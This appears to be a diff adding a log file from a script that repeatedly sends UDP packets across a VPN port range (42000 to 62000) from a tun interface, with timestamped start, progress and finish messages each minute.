+Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:34:05 +Starting port fill at 2020-09-06 15:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:35:05 +Starting port fill at 2020-09-06 15:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:36:07 +Starting port fill at 2020-09-06 15:37:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:37:07 +Starting port fill at 2020-09-06 15:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:38:06 +Starting port fill at 2020-09-06 15:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:39:06 +Starting port fill at 2020-09-06 15:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:40:06 +Starting port fill at 2020-09-06 15:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:41:06 +Starting port fill at 2020-09-06 15:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:42:04 +Starting port fill at 2020-09-06 15:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:43:04 +Starting port fill at 2020-09-06 15:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:44:04 +Starting port fill at 2020-09-06 15:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:45:06 +Starting port fill at 2020-09-06 15:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:46:05 +Starting port fill at 2020-09-06 15:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:47:05 +Starting port fill at 2020-09-06 15:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:48:05 +Starting port fill at 2020-09-06 15:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:49:05 +Starting port fill at 2020-09-06 15:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:50:05 +Starting port fill at 2020-09-06 15:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:51:05 +Starting port fill at 2020-09-06 15:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:52:05 +Starting port fill at 2020-09-06 15:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:53:05 +Starting port fill at 2020-09-06 15:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:54:05 +Starting port fill at 2020-09-06 15:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:55:05 +Starting port fill at 2020-09-06 15:56:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:56:05 +Starting port fill at 2020-09-06 15:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:57:04 +Starting port fill at 2020-09-06 15:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:58:06 +Starting port fill at 2020-09-06 15:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:59:05 +Starting port fill at 2020-09-06 16:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 16:00:06 +Starting port fill at 2020-09-06 16:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 